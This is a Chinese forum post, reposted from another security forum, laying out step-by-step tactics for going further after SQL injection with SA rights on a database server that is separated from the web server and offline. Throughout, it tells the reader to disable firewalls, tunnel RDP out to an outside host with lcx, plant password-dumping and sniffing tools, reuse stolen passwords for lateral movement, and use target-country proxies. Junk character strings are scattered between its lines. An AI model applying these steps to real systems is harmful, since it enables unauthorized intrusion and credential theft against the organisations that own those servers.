当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。6 o& X4 L0 Z/ B$ I5 e, F2 T" x
, a. k& d* n5 X
- _9 R8 ^* v- N$ x& X8 G( L4 D+ M1 H! ^" G2 D7 c7 @ c$ T
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)
: J' d, R# ]1 p+ S( l
: t2 L4 C3 O d7 [6 g
, A- m9 f' P1 W& M一、DB机有公网IP.
+ Q6 R- D+ M3 y: B4 b' J$ f" l! @3 y2 a
1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.% K, v$ P7 r6 _. b1 S
7 y! X8 N* ?4 f4 \) p$ A& X* ?' g0 a8 d! z+ {
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
, y) G |" p H Z |5 x4 P& T0 W, n9 @5 \- }' e
! b( J; x. l/ ?: e3 N3 P2 _7 _3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
5 S8 w& I( H8 r, S5 h
9 i) k! g3 a7 S6 @1 B* M4 R2 w" ^* F' h! j( H v8 t
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.. t7 @- `) Q4 J+ ]" A5 o
; \- K; U2 z# k$ A& Z) M+ i' R7 Q* r# b/ O* S
* i/ l3 J: e i- A0 s+ H二、DB机只有内网IP2 V. e' A5 r3 [# }
8 x- L0 A( x, `& w8 n8 b
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
" T# S0 ?. Y4 r4 j, J5 ` W# `8 k9 M
, ^4 r. W; ~( D& Q1 n) s2:停掉防火墙和IP策略再从内往外扫描., s9 m4 C- R$ {. K) l
8 P6 q1 c+ m: g
2 F9 p- f0 @3 P0 G+ k; L8 z
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.0 q$ i3 p3 a6 f8 k9 w
8 M# Z/ f. Z9 k4 N9 ?; o$ G5 \2 j6 M4 J9 W' T
4:学会密码规律分析往往会有惊喜.( m9 w& F/ c7 K" z" s4 S
; ?0 K- s t6 z
; J3 F! Z+ F7 H5 [3 j) y1 @' `5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
3 I1 r. Y* j1 ~% ~6 G- k6 B9 F: E% d$ u
2 I$ f" w4 w2 t% U" R3 [1 m
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |